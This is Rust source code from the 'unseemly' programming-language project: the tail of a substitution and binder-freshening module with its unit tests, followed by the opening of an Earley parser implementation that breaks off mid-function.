beta.clone(), )) } QuoteMore(ref body, pos) => { node.with_c(QuoteMore(substitute_rec(body, cur_node_contents, &env.q_more(1)), *pos)) } QuoteLess(ref body, depth) => node.with_c(QuoteLess( substitute_rec(body, cur_node_contents, &env.q_less(*depth)), *depth, )), _ => node.clone(), } } /// Substitute `VariableReference`s in `node`, according to `env`. /// TODO: don't use this to "capture the environment"; it doesn't work in the presence of recursion /// Instead, we should introduce a "constant" to Beta. (Does `SameAs` suffice now?) /// TODO: because of mu's use of `VariableReference`s in a place where other `Ast`s are forbidden, /// it seems like this has limited use. /// TODO: this isn't capture-avoiding (and shouldn't be, when called by `freshen_rec`) /// It's safe to use when the RHS of the environment is just fresh names. pub fn substitute(node: &Ast, env: &Assoc<Name, Ast>) -> Ast { substitute_rec(node, &EnvMBE::new(), &Ren::from(env.clone())) } /// Like `beta::names_mentioned`, but for all the imports in `parts` fn mentioned_in_import(parts: &EnvMBE<Ast>) -> Vec<Name> { fn process_ast(a: &Ast, v: &mut Vec<Name>) { match a.c() { Node(_, _, _) => {} // new scope ExtendEnv(ref body, ref beta) | ExtendEnvPhaseless(ref body, ref beta) => { let mut beta_mentions = beta.names_mentioned_and_bound(); v.append(&mut beta_mentions); process_ast(&*body, v); } // TODO: does it make sense to mention a name underneath a quotation? QuoteMore(ref body, _) | QuoteLess(ref body, _) => process_ast(body, v), Trivial | Atom(_) | VariableReference(_) => {} // no beta Shape(_) | IncompleteNode(_) => icp!("{:?} isn't a complete AST", a), } } let mut res = vec![]; parts.map(&mut |a| process_ast(a, &mut res)); res } fn freshen_rec(node: &Ast, renamings: &EnvMBE<(Ast, Ren)>, env: Ren) -> Ast { // `env` is used to update the references to those atoms to match match node.c() { Node(_, _, _) => substitute_rec(node, &EnvMBE::new(), &env), VariableReference(n) => env.find(*n).unwrap_or(&node.clone()).clone(), ExtendEnv(ref body, ref beta) => { let new_env = env.set_assoc(&beta.extract_from_mbe(renamings, &|x: &(_, Ren)| &x.1)); node.with_c(ExtendEnv(freshen_rec(body, renamings, new_env), beta.clone())) } ExtendEnvPhaseless(ref body, ref beta) => { // Everything bound this way becomes phaseless. let new__env = env.set_assoc( &beta.extract_from_mbe(renamings, &|x: &(_, Ren)| &x.1).become_phaseless(), ); node.with_c(ExtendEnvPhaseless(freshen_rec(body, renamings, new__env), beta.clone())) } QuoteMore(ref body, pos) => { node.with_c(QuoteMore(freshen_rec(body, renamings, env.q_more(1)), *pos)) } QuoteLess(ref body, depth) => { node.with_c(QuoteLess(freshen_rec(body, renamings, env.q_less(*depth)), *depth)) } Atom(_) | Trivial | IncompleteNode(_) | Shape(_) => node.clone(), } } thread_local! { pub static freshening_enabled: std::cell::RefCell<bool> = std::cell::RefCell::new(true); pub static watching: Option<String> = std::env::var(&"UNSEEMLY_FRESHEN_WATCH").ok(); } pub fn freshen(a: &Ast) -> Ast { // TODO: I think this shouldn't take a reference for performance if freshening_enabled.with(|f| *f.borrow()) { a.c_map(&|c| match c { &Node(ref f, ref p, ref export) => { // Every part that gets mentioned inside this node... let mentioned = mentioned_in_import(p); // ...needs to have its binders freshend: let fresh_ast_and_rens = freshen_binders_inside_node(p, &mentioned); let freshened_node = Node( f.clone(), fresh_ast_and_rens.marched_map( &mut |_, marched: &EnvMBE<(Ast, Ren)>, &(ref part, _)| { freshen_rec(part, marched, Ren::new()) }, ), export.clone(), ); // Diagnostic output for "watching freshening". watching.with(|watching_name| { if let Some(name) = watching_name { let freshened_to = fresh_ast_and_rens.map_reduce( &|ast_and_ren: &(Ast, Ren)| ast_and_ren.1.find_orig(name), &|lhs: &Option<(Name, Ast)>, rhs: &Option<(Name, Ast)>| { lhs.clone().or(rhs.clone()) }, None, ); if let Some((k, new_ast)) = freshened_to { println!("🥦 Renaming {} => {}:", k, new_ast); println!("🥦 {}", freshened_node) } } }); freshened_node } non_node => non_node.clone(), }) } else { a.clone() } } // TODO: verify that this handles internal `ExtendEnv`s right pub fn freshen_with(lhs: &Ast, rhs: &Ast) -> (Ast, Ast) { if freshening_enabled.with(|f| *f.borrow()) { match (lhs.c(), rhs.c()) { (&Node(ref f, ref p_lhs, ref export), &Node(ref f_rhs, ref p_rhs, ref export_rhs)) => { if f != f_rhs || export != export_rhs { return (lhs.clone(), rhs.clone()); } // Every part that gets mentioned inside this node... let mentioned = mentioned_in_import(p_lhs); // (if it matters which `p_{l,r}hs` we used, the match below will be `None`) // ...needs to have its binders freshend: match freshen_binders_inside_node_with(p_lhs, p_rhs, &mentioned) { Some(fresh_ast_and_rens) => { let new_p_lhs = fresh_ast_and_rens.marched_map( &mut |_, marched: &EnvMBE<(Ast, Ren, Ast, Ren)>, &(ref parts, _, _, _)| { freshen_rec( parts, &marched.map(&mut |q| (q.0.clone(), q.1.clone())), Ren::new(), ) }, ); let new_p_rhs = fresh_ast_and_rens.marched_map( &mut |_, marched: &EnvMBE<(Ast, Ren, Ast, Ren)>, &(_, _, ref parts, _)| { freshen_rec( parts, &marched.map(&mut |q| (q.2.clone(), q.3.clone())), Ren::new(), ) }, ); ( lhs.with_c(Node(f.clone(), new_p_lhs, export.clone())), rhs.with_c(Node(f.clone(), new_p_rhs, export.clone())), ) } None => (lhs.clone(), rhs.clone()), // No destructuring will be performed! } } _ => (lhs.clone(), rhs.clone()), // No binding } } else { (lhs.clone(), rhs.clone()) // Freshening is disabled } } pub fn freshen_binders_inside_node(parts: &EnvMBE<Ast>, mentioned: &[Name]) -> EnvMBE<(Ast, Ren)> { parts.named_map(&mut |n: &Name, a: &Ast| { if mentioned.contains(n) { freshen_binders(a) } else { (a.clone(), Ren::new()) } }) } pub fn freshen_binders_inside_node_with( p_lhs: &EnvMBE<Ast>, p_rhs: &EnvMBE<Ast>, men: &[Name], ) -> Option<EnvMBE<(Ast, Ren, Ast, Ren)>> { if !p_lhs.can_map_with(p_rhs) { return None; } p_lhs .named_map_with(p_rhs, &|n: &Name, a_lhs: &Ast, a_rhs: &Ast| { if men.contains(n) { freshen_binders_with(a_lhs, a_rhs).ok_or(()) } else { Ok((a_lhs.clone(), Ren::new(), a_rhs.clone(), Ren::new())) } }) .lift_result() .ok() } /// Returns an `Ast` like `a`, but with fresh `Atom`s /// and a map to change references in the same manner pub fn freshen_binders(a: &Ast) -> (Ast, Ren) { match a.c() { Trivial | VariableReference(_) => (a.clone(), Ren::new()), Atom(old_name) => { let new_name = old_name.freshen(); ( a.with_c(Atom(new_name)), Ren::single(*old_name, raw_ast!(VariableReference(new_name))), ) } Node(ref f, ref parts, ref export) => { if export == &crate::beta::ExportBeta::Nothing { return (a.clone(), Ren::new()); // short-circuit (should this at least warn?) } let exported = export.names_mentioned(); // Unmentioned atoms shouldn't be touched let fresh_pairs = freshen_binders_inside_node(parts, &exported); let fresh_ast = fresh_pairs.map(&mut |&(ref a, _): &(Ast, _)| a.clone()); let renaming = export.extract_from_mbe(&fresh_pairs, &|&(_, ref r): &(_, Ren)| &r); (a.with_c(Node(f.clone(), fresh_ast, export.clone())), renaming) } IncompleteNode(_) | Shape(_) => icp!("didn't think this was needed"), QuoteMore(ref body, pos) => { let (new_a, r) = freshen_binders(body); (a.with_c(QuoteMore(new_a, *pos)), r.q_less(1)) } QuoteLess(ref body, depth) => { let (new_a, r) = freshen_binders(body); (a.with_c(QuoteLess(new_a, *depth)), r.q_more(*depth)) } ExtendEnv(ref sub, ref beta) => { // We're only looking at `Atom`s, so this is transparent let (new_sub, subst) = freshen_binders(&*sub); (a.with_c(ExtendEnv(new_sub, beta.clone())), subst) } ExtendEnvPhaseless(ref sub, ref beta) => { // We're only looking at `Atom`s, so this is transparent let (new_sub, subst) = freshen_binders(&*sub); (a.with_c(ExtendEnvPhaseless(new_sub, beta.clone())), subst.become_phaseless()) } } } /// Like `freshen_binders`, but to unite two `Ast`s with identical structure (else returns `None`). pub fn freshen_binders_with(lhs: &Ast, rhs: &Ast) -> Option<(Ast, Ren, Ast, Ren)> { match (lhs.c(), rhs.c()) { (&Trivial, &Trivial) | (&VariableReference(_), &VariableReference(_)) => { Some((lhs.clone(), Ren::new(), rhs.clone(), Ren::new())) } (&Atom(old_name_lhs), &Atom(old_name_rhs)) => { let new_name = old_name_lhs.freshen(); Some(( lhs.with_c(Atom(new_name)), Ren::single(old_name_lhs, raw_ast!(VariableReference(new_name))), rhs.with_c(Atom(new_name)), Ren::single(old_name_rhs, raw_ast!(VariableReference(new_name))), )) } // TODO: Handle matching `'[let (a,b) = ⋯]'` against the pattern `'[let ,[p], = ⋯]'` !! ( &Node(ref f, ref parts_lhs, ref export), &Node(ref f_rhs, ref parts_rhs, ref export_rhs), ) => { if f != f_rhs || export != export_rhs { return None; } if export == &crate::beta::ExportBeta::Nothing { // short-circuit: return Some((lhs.clone(), Ren::new(), rhs.clone(), Ren::new())); } let exported = export.names_mentioned(); // Unmentioned atoms shouldn't be touched match freshen_binders_inside_node_with(parts_lhs, parts_rhs, &exported) { Some(fresh_pairs) => { let fresh_ast_lhs = fresh_pairs.map(&mut |&(ref a, _, _, _)| a.clone()); let fresh_ast_rhs = fresh_pairs.map(&mut |&(_, _, ref a, _)| a.clone()); let ren_lhs = export.extract_from_mbe(&fresh_pairs, &|t: &(_, Ren, _, _)| &t.1); let ren_rhs = export.extract_from_mbe(&fresh_pairs, &|t: &(_, _, _, Ren)| &t.3); Some(( lhs.with_c(Node(f.clone(), fresh_ast_lhs, export.clone())), ren_lhs, rhs.with_c(Node(f.clone(), fresh_ast_rhs, export.clone())), ren_rhs, )) } None => None, } } (&QuoteMore(ref body_lhs, pos), &QuoteMore(ref body_rhs, pos_rhs)) if pos == pos_rhs => { match freshen_binders_with(&*body_lhs, &*body_rhs) { Some((n_lhs, ren_lhs, n_rhs, ren_rhs)) => Some(( lhs.with_c(QuoteMore(n_lhs, pos)), ren_lhs.q_less(1), rhs.with_c(QuoteMore(n_rhs, pos)), ren_rhs.q_less(1), )), None => None, } } (&QuoteLess(ref body_lhs, depth), &QuoteLess(ref body_rhs, depth_rhs)) if depth == depth_rhs => { match freshen_binders_with(&*body_lhs, &*body_rhs) { Some((n_lhs, ren_lhs, n_rhs, ren_rhs)) => Some(( lhs.with_c(QuoteLess(n_lhs, depth)), ren_lhs.q_more(depth), rhs.with_c(QuoteLess(n_rhs, depth)), ren_rhs.q_more(depth), )), None => None, } } (&IncompleteNode(_), _) | (&Shape(_), _) => icp!("didn't think this was needed"), (&ExtendEnv(ref sub_lhs, ref beta), &ExtendEnv(ref sub_rhs, ref beta_rhs)) | ( &ExtendEnvPhaseless(ref sub_lhs, ref beta), &ExtendEnvPhaseless(ref sub_rhs, ref beta_rhs), ) => { if beta != beta_rhs { return None; } let ee = |a: Ast| -> Ast { if let ExtendEnv(_, _) = lhs.c() { a.with_c(ExtendEnv(a.clone(), beta.clone())) } else { a.with_c(ExtendEnvPhaseless(a.clone(), beta.clone())) } }; // We're only looking at `Atom`s, so this is transparent match freshen_binders_with(&*sub_lhs, &*sub_rhs) { Some((n_lhs, ren_lhs, n_rhs, ren_rhs)) => { Some((ee(n_lhs), ren_lhs, ee(n_rhs), ren_rhs)) } None => None, } } _ => None, // Match failure } } #[test] fn basic_substitution() { crate::name::enable_fake_freshness(true); assert_eq!( substitute( &ast!({"Expr" "apply" : "rator" => (vr "a"), "rand" => [(vr "b"), (vr "c")]}), &assoc_n!("x" => ast!((vr "y")), "buchanan" => ast!((vr "lincoln"))) ), ast!({"Expr" "apply" : "rator" => (vr "a"), "rand" => [(vr "b"), (vr "c")]}) ); assert_eq!( substitute( &ast!({"Expr" "apply" : "rator" => (vr "buchanan"), "rand" => [(vr "buchanan"), (vr "c")]}), &assoc_n!("x" => ast!((vr "y")), "buchanan" => ast!((vr "lincoln"))) ), ast!({"Expr" "apply" : "rator" => (vr "lincoln"), "rand" => [(vr "lincoln"), (vr "c")]}) ); assert_eq!( substitute( &ast!({"Expr" "lambda" : "param" => ["b", "x"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "c")]})}), &assoc_n!("a" => ast!((vr "A")), "b" => ast!((vr "B")), "c" => ast!((vr "C"))) ), ast!({"Expr" "lambda" : "param" => ["b", "x"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "A"), (vr "b"), (vr "C")]})}) ); } #[test] fn basic_binder_freshening() { crate::name::enable_fake_freshness(true); assert_eq!(freshen_binders(&ast!((vr "a"))), (ast!((vr "a")), Ren::new())); assert_eq!( freshen_binders(&ast!("a")), (ast!("a🍅"), Ren::from(assoc_n!("a" => ast!((vr "a🍅"))))) ); assert_eq!( freshen_binders(&ast!({ "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a", "b"] })), ( ast!({ "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a🍅", "b🍅"] }), Ren::from(assoc_n!("a" => ast!((vr "a🍅")), "b" => ast!((vr "b🍅")))) ) ); } #[test] fn basic_freshening() { crate::name::enable_fake_freshness(true); assert_eq!( freshen(&ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "c"), (vr "d")]})})), ast!({"Expr" "lambda" : "param" => ["a🍅", "b🍅"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a🍅"), (vr "b🍅"), (vr "c"), (vr "d")]})}) ); assert_eq!( freshen(&ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" "a", "b"], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a")), (import ["p" = "scrutinee"] (vr "x"))] })), ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" "a🍅", "b🍅"], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a🍅")), (import ["p" = "scrutinee"] (vr "x"))]}) ); // Test that importing non-atoms works assert_eq!( freshen(&ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a"))] })), ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a🍅"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a🍅"))]}) ); // TODO: test more! } #[test] fn basic_phaseless_freshening() { crate::name::enable_fake_freshness(true); assert_eq!( freshen(&ast!({"Expr" "lambda" : "param" => ["a"], "pparam" => ["b"], "body" => (import_phaseless [* ["pparam" : "[ignored]"]] (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (++ true (vr "a")), (++ true (vr "b"))]}))})), ast!({"Expr" "lambda" : "param" => ["a🍅"], "pparam" => ["b🍅"], "body" => (import_phaseless [* ["pparam" : "[ignored]"]] (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a🍅"), (vr "b🍅"), (++ true (vr "a")), (++ true (vr "b🍅"))]}))}) ) } #[test] fn basic_freshening_with() { crate::name::enable_fake_freshness(true); assert_eq!( freshen_with(&ast!({"Type" "Int" :}), &ast!({"Type" "Float" :})), (ast!({"Type" "Int" :}), ast!({"Type" "Float" :})) ); assert_eq!( freshen_with( &ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "c"), (vr "d")]})}), &ast!({"Expr" "lambda" : "param" => ["j", "k"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "j"), (vr "k"), (vr "x"), (vr "x")]})}) ), ( ast!({"Expr" "lambda" : "param" => ["a🍅", "b🍅"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a🍅"), (vr "b🍅"), (vr "c"), (vr "d")]})}), ast!({"Expr" "lambda" : "param" => ["a🍅", "b🍅"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a🍅"), (vr "b🍅"), (vr "x"), (vr "x")]})}) ) ); assert_eq!( freshen_with( &ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a"))] }), &ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["x"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "x"))] }) ), ( ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a🍅"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a🍅"))]}), ast!({"Expr" "match" : "scrutinee" => (vr "x"), "p" => [@"arm" { "Pat" "enum_pat" => [* ["component"]] : "name" => "[ignored]", "component" => ["a🍅"] }], "arm" => [@"arm" (import ["p" = "scrutinee"] (vr "a🍅"))]}) ) ); // Terms that don't match are unaffected assert_eq!( freshen_with( &ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "c"), (vr "d")]})}), &ast!({"Expr" "lambda" : "param" => ["abc"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "x"), (vr "x")]})}) ), ( ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "c"), (vr "d")]})}), ast!({"Expr" "lambda" : "param" => ["abc"], "body" => (import [* ["param" : "[ignored]"]] {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b"), (vr "x"), (vr "x")]})}) ) ); } #[test] fn mu_substitution() { let trivial_mu = ast!( { "Type" "mu_type" : "param" => [(import [prot "param"] (vr "T"))], "body" => (import [* [prot "param"]] (vr "T")) }); assert_eq!(freshen(&trivial_mu), trivial_mu); assert_eq!( substitute(&trivial_mu, &assoc_n!("T" => ast!((vr "S")))), ast!( { "Type" "mu_type" : "param" => [(import [prot "param"] (vr "S"))], "body" => (import [* [prot "param"]] (vr "S")) }) ) } #[test] fn alpha_quote_more_or_less() { crate::name::enable_fake_freshness(true); assert_eq!( freshen(&ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] (++ true {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b")]}))})), ast!({"Expr" "lambda" : "param" => ["a🍅", "b🍅"], "body" => (import [* ["param" : "[ignored]"]] (++ true {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b")]}))}) ); assert_eq!( freshen(&ast!({"Expr" "lambda" : "param" => ["a", "b"], "body" => (import [* ["param" : "[ignored]"]] (++ true (-- 1 {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a"), (vr "b")]})))})), ast!({"Expr" "lambda" : "param" => ["a🍅", "b🍅"], "body" => (import [* ["param" : "[ignored]"]] (++ true (-- 1 {"Expr" "apply" : "rator" => (vr "f"), "rand" => [(vr "a🍅"), (vr "b🍅")]})))}) ); }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/earley.rs
src/earley.rs
#![allow(non_upper_case_globals)] // An Earley parser! // Partly based on advice from http://loup-vaillant.fr/tutorials/earley-parsing/. // Partly based on https://arxiv.org/abs/1102.2003 // (though I'll save you the trouble of reading that one: // it can be summed up as "Just add the current grammar to the Earley rules, // and everything will work out fine.") // Why Earley? // * Earley parses arbitrary CFLs, which are // - a category of languages I can comprehend, // - and closed under composition (though ambiguity can creep in) // * Earley has a pretty good error message story (TODO: check that this is true) // * Earley maxes out at O(n^3) time†, and for practical grammars tends to be linear // †technically, the reflective bit makes parsing NP-complete, but No One Will Do That. // // Also, it turns out that implementing an Earley parser goes pretty smoothly. Yay! use crate::{ ast, ast::{Ast, LocatedAst}, ast_walk::LazyWalkReses, grammar::{ FormPat::{self, *}, SynEnv, }, name::*, util::{assoc::Assoc, mbe::EnvMBE}, }; use std::{cell::RefCell, collections::HashMap, rc::Rc}; // TODO: This UniqueId stuff is great, but we could make things faster // by storing array indices instead thread_local! { static next_id: RefCell<u32> = RefCell::new(0); // TODO: instead of indexing by unique cell, we should intern `ParseContext`s // for fast (and not just pointer-based) comparison. static all_parse_contexts: RefCell<HashMap<UniqueIdRef, ParseContext>> = RefCell::new(HashMap::new()); // For parse error reporting: how far have we gotten? static best_token: RefCell<(usize, Rc<FormPat>, usize)> = RefCell::new((0, Rc::new(Impossible), 0)); pub static files: RefCell<codespan_reporting::files::SimpleFiles<String, String>> = RefCell::new(codespan_reporting::files::SimpleFiles::new()) } fn get_next_id() -> UniqueId { next_id.with(|id| { let res = UniqueId(*id.borrow()); *id.borrow_mut() += 1; res }) } // Specifically *not* `Clone` or `Copy` #[derive(PartialEq, Eq)] pub struct UniqueId(u32); impl std::fmt::Debug for UniqueId { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "{}", self.0) } } #[derive(PartialEq, Eq, Clone, Copy, Hash)] pub struct UniqueIdRef(u32); impl UniqueId { fn get_ref(&self) -> UniqueIdRef { UniqueIdRef(self.0) } fn is(&self, other: UniqueIdRef) -> bool { self.0 == other.0 } } impl std::fmt::Debug for UniqueIdRef { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "{}", self.0) } } // TODO: We should probably refactor to use `ParseContext` // everywhere we currently use these two things together (particularly `earley.rs`). custom_derive! { #[derive(Clone, Debug)] pub struct ParseContext { pub grammar: SynEnv, pub type_ctxt: LazyWalkReses<crate::ty::SynthTy>, pub eval_ctxt: LazyWalkReses<crate::runtime::eval::Eval> } } impl crate::runtime::reify::Reifiable for ParseContext { fn ty_name() -> Name { n("Language") } fn reify(&self) -> crate::runtime::eval::Value { crate::runtime::eval::Value::ParseContext(Box::new(self.clone())) } fn reflect(v: &crate::runtime::eval::Value) -> ParseContext { extract!((v) crate::runtime::eval::Value::ParseContext = (ref lang) => (**lang).clone()) } } impl PartialEq for ParseContext { fn eq(&self, other: &ParseContext) -> bool { self as *const ParseContext == other as *const ParseContext } } impl ParseContext { pub fn new_from_grammar(se: SynEnv) -> ParseContext { ParseContext { grammar: se, // TODO: uh, I think this is unused? type_ctxt: LazyWalkReses::<crate::ty::SynthTy>::new_empty(), eval_ctxt: LazyWalkReses::<crate::runtime::eval::Eval>::new_empty(), } } pub fn with_grammar(self, se: SynEnv) -> ParseContext { ParseContext { grammar: se, ..self } } } // Hey, this doesn't need to be Reifiable! pub struct Item { /// Where (in the token input stream) this rule tried to start matching start_idx: usize, /// What are we trying to match? rule: Rc<FormPat>, /// The location of the • in the rule. Most rules are very short pos: usize, /// The current grammar, so we can interperate `Call` rules, /// and environments for typing/evaluating syntax extensions pc: Rc<ParseContext>, // -- Just for error messages -- /// This rule is too commonplace to be informative in a parse error common: bool, /// What file are we in? file_id: usize, // -- Everything after this line is nonstandard, and is just here as an optimization-- /// Identity for the purposes of `wanted_by` and `local_parse` id: UniqueId, /// Can this complete things that have asked for it? /// This is mostly a convenience. done: RefCell<bool>, // Can this complete things that have asked for it? /// For simple (leaf) nodes, we just store the resulting parse right away. /// This is a convenience so that extracting the parse tree /// doesn't require trawling through the token input /// For non-leaf nodes, store the ID of the item that provides justification local_parse: RefCell<LocalParse>, /// Traditionally, when a rule is completed in Earley parsing, /// one looks to try to find all the rules that could have asked for it. /// That's expensive! But keeping back-pointers instead has a timing problem: /// we might create a new item with an advanced • (possibly one token ahead) /// before we know everything that called for the original item. /// Therefore, we make sure that all items that start in the same place /// with the same rule/grammar /// share the same set of origins via `RefCell`. /// /// This, uh, might be an excessively cocky design. /// But searching item lists is *hard* when your Earley parser /// has so many different kinds of rules! wanted_by: Rc<RefCell<Vec<UniqueIdRef>>>, } /// Information for parsing. It's not a parse tree, but it tells you the next step to get one. /// (Hence "local") #[derive(PartialEq, Debug, Clone)] enum LocalParse { /// ⊤; no information yet NothingYet, JustifiedByItemPlanB(UniqueIdRef), // Looking for a better parse, though... (for `Biased`) JustifiedByItem(UniqueIdRef), /// This might be more than an atom, but *only* in the rare `Anyways` case. ParsedAtom(Ast), /// ⊥; contradiction (TMI!) Ambiguous(Box<LocalParse>, Box<LocalParse>), } use self::LocalParse::*; impl PartialOrd for LocalParse { /// Establish a lattice for `LocalParse`; some parses are better than others. /// `Biased` allows one to find a "Plan B" parse that gets overwritten by "Plan A". /// But there's also `NothingYet`, for ... (TODO: only leaves and just-started nodes?) /// ... and `Ambiguous`, when we know that there are multiple justifications for a single node fn partial_cmp(&self, other: &LocalParse) -> Option<std::cmp::Ordering> { use std::cmp::Ordering::*; if self == other { return Some(Equal); } match (self, other) { (&NothingYet, _) | (_, &Ambiguous(_, _)) => Some(Less), (&Ambiguous(_, _), _) | (_, &NothingYet) => Some(Greater), (&JustifiedByItemPlanB(_), &JustifiedByItem(_)) => Some(Less), (&JustifiedByItem(_), &JustifiedByItemPlanB(_)) => Some(Greater), (&JustifiedByItem(_), &JustifiedByItem(_)) => None, // semantically, this ought to be `None`, but that would be a hard-to-debug logic error _ => icp!("Attempted to compare {:#?} and {:#?}", self, other), } } } impl Clone for Item { fn clone(&self) -> Item { Item { start_idx: self.start_idx, rule: self.rule.clone(), pos: self.pos, pc: self.pc.clone(), common: self.common, file_id: self.file_id, id: get_next_id(), done: self.done.clone(), local_parse: RefCell::new(LocalParse::NothingYet), wanted_by: self.wanted_by.clone(), } } } /// Progress through the state sets // TODO: this ought to produce an Option<ParseError>, not a bool! fn create_chart( rule: Rc<FormPat>, pc: ParseContext, toks: &str, file_id: usize, ) -> (UniqueId, Vec<Vec<Item>>) { let toks = toks.trim(); // HACK: tokens don't consume trailing whitespace let mut chart: Vec<Vec<Item>> = vec![]; chart.resize_with(toks.len() + 1, std::default::Default::default); let start_but_startier = get_next_id(); let start_item = Item { start_idx: 0, rule: rule, pos: 0, pc: Rc::new(pc), common: false, file_id: file_id, id: get_next_id(), done: RefCell::new(false), local_parse: RefCell::new(LocalParse::NothingYet), wanted_by: Rc::new(RefCell::new(vec![start_but_startier.get_ref()])), }; chart[0].push(start_item); for cur_tok in 0..toks.len() { walk_tt(&mut chart, &toks, cur_tok) } examine_state_set(&mut chart, &toks, toks.len()); // One last time, for nullable rules at the end (start_but_startier, chart) } /// Recognize `rule` in `grammar` (but assume no code will need to be executed) /// For testing only; doesn't set the filename properly! fn recognize(rule: &FormPat, grammar: &SynEnv, toks: &str) -> bool { let (start_but_startier, chart) = create_chart( Rc::new(rule.clone()), ParseContext::new_from_grammar(grammar.clone()), toks, 0, ); chart[chart.len() - 1].iter().any(|item| { (*item.wanted_by.borrow()).iter().any(|idr| start_but_startier.is(*idr)) && *item.done.borrow() }) } fn walk_tt(chart: &mut Vec<Vec<Item>>, toks: &str, cur_tok: usize) { examine_state_set(chart, toks, cur_tok); // log!("\n {:#?}\n->{:#?}\n", chart[*cur_tok], chart[*cur_tok + 1]); } /// Progresses a state set until it won't go any further. /// Returns the state set for the next token. fn examine_state_set(chart: &mut Vec<Vec<Item>>, toks: &str, cur_tok: usize) { // If nullable items are statically identified, I think there's an optimization // where we don't re-walk old items while new_items_from_state_set(chart, toks, cur_tok) {} // Until a fixpoint is reached } fn new_items_from_state_set(chart: &mut Vec<Vec<Item>>, toks: &str, cur_tok: usize) -> bool { let mut effect = false; for idx in 0..chart[cur_tok].len() { for (new_item, adv) in chart[cur_tok][idx].examine(toks, cur_tok, chart) { effect = merge_into_state_set(new_item, &mut chart[cur_tok + adv]) || effect; } } effect } // Returns whether anything happened fn merge_into_state_set(item: Item, items: &mut Vec<Item>) -> bool { for i in items.iter() { if i.similar(&item) { if i.as_good_as(&item) { return false; // no new information } log!("improved item: {:#?} vs. {:#?}\n", item, i); i.merge(&item); return true; } } log!("new item: {:#?}\n", item); items.push(item); true } impl std::fmt::Debug for Item { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!( f, "[({:?}){}({}.{}){}<{:?} - {:?}>]", self.id, self.start_idx, self.rule, self.pos, if *self.done.borrow() { "✓" } else { "…" }, self.local_parse.borrow(), self.wanted_by.borrow() ) } } impl Item { /// This is pointer equality on `rule` and `grammar` for speed. /// Also, it intentionally ignores `done`, `local_parse`, and `wanted_by`, /// because those should be merged. fn similar<'f>(&'f self, other: &'f Item) -> bool { self.start_idx == other.start_idx && &*self.rule as *const FormPat == &*other.rule as *const FormPat && self.pos == other.pos && self.pc.grammar.almost_ptr_eq(&other.pc.grammar) } /// `false` if `other` might provide new information /// `true` if `other` definitely provides no new information /// (this is conservative regarding `wanted_by`) fn as_good_as<'f>(&'f self, other: &'f Item) -> bool { assert!(self.similar(other)); (*self.done.borrow() == *other.done.borrow() || !*other.done.borrow()) // no more done? && (*other.local_parse.borrow() <= 